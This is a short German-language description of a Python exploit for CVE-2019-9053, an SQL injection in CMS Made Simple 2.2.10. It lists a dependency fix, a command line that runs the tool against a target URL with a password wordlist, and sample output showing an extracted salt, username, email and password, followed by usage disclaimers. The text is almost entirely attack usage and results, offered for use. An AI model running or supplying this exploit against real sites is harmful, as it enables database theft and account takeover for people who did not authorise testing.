
Python-Exploit für CVE-2019-9053 SQL-Injection in CMS Made Simple 2.2.10 mit Passwort-Hash-Cracking und Benutzer-Enumeration-Funktionen.
Der Exploit wurde aktualisiert, um Python 3 zu unterstützen.
Traceback (most recent call last): File "46635.py", line 12, in from termcolor import colored ImportError: No module named termcolor
pip install termcolor
python cve.py -u http://target --crack -w /usr/share/wordlists/best110.txt
[+] Salt for password found: 18
[+] Username found: mitw
[+] Email found: adk
[+] Password found: 0c01f4468d
# Die Benutzer übernehmen die vollständige Verantwortung für alle mit diesem Tool durchgeführten Aktionen.
# Wenn diese Bedingungen für Sie nicht akzeptabel sind, verwenden Sie dieses Tool nicht. # Bitte verwenden Sie dieses Tool nur in Umgebungen, in denen Sie berechtigt sind, Penetrationstests durchzuführen. # Bitte verwenden Sie dieses Tool nicht für böswillige Zwecke.